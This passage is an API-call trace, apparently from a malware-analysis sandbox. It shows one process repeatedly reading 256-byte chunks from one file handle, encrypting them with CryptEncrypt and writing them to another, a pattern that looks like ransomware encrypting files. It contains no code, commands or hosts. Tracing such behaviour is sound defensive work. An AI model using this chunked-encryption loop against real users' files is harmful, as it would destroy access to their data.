0x0 [0152.589] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.589] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.589] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.589] GetLastError () returned 0x0 [0152.589] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.589] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.589] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.589] GetLastError () returned 0x0 [0152.589] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.590] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.590] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.590] GetLastError () returned 0x0 [0152.590] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.590] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.590] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.590] GetLastError () returned 0x0 [0152.590] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.590] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.590] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.590] GetLastError () returned 0x0 [0152.590] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.590] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.590] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.590] GetLastError () returned 0x0 [0152.590] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.590] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.590] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.590] GetLastError () returned 0x0 [0152.590] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.590] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.590] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.590] GetLastError () returned 0x0 [0152.590] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.591] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.591] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.591] GetLastError () returned 0x0 [0152.591] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.591] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.591] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.591] GetLastError () returned 0x0 [0152.591] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.591] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.591] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.591] GetLastError () returned 0x0 [0152.591] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.591] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.591] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.591] GetLastError () returned 0x0 [0152.591] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.591] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.591] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.591] GetLastError () returned 0x0 [0152.591] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.591] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.591] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.591] GetLastError () returned 0x0 [0152.591] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.591] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.592] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.592] GetLastError () returned 0x0 [0152.592] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.592] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.592] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.592] GetLastError () returned 0x0 [0152.592] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.592] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.592] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.592] GetLastError () returned 0x0 [0152.592] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.592] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.592] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.592] GetLastError () returned 0x0 [0152.592] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.592] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.592] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.592] GetLastError () returned 0x0 [0152.592] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.592] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.592] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.592] GetLastError () returned 0x0 [0152.592] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.592] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.592] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.592] GetLastError () returned 0x0 [0152.592] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.593] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.593] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.593] GetLastError () returned 0x0 [0152.593] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.593] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.593] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.593] GetLastError () returned 0x0 [0152.593] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.593] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.593] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.593] GetLastError () returned 0x0 [0152.593] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.593] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.593] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.593] GetLastError () returned 0x0 [0152.593] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.593] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.593] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.593] GetLastError () returned 0x0 [0152.593] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.593] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.593] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.593] GetLastError () returned 0x0 [0152.593] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.594] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.594] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.594] GetLastError () returned 0x0 [0152.594] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.594] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.594] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.594] GetLastError () returned 0x0 [0152.594] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.594] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.594] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.594] GetLastError () returned 0x0 [0152.594] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.594] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.594] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.594] GetLastError () returned 0x0 [0152.594] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.594] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.594] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.594] GetLastError () returned 0x0 [0152.594] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, 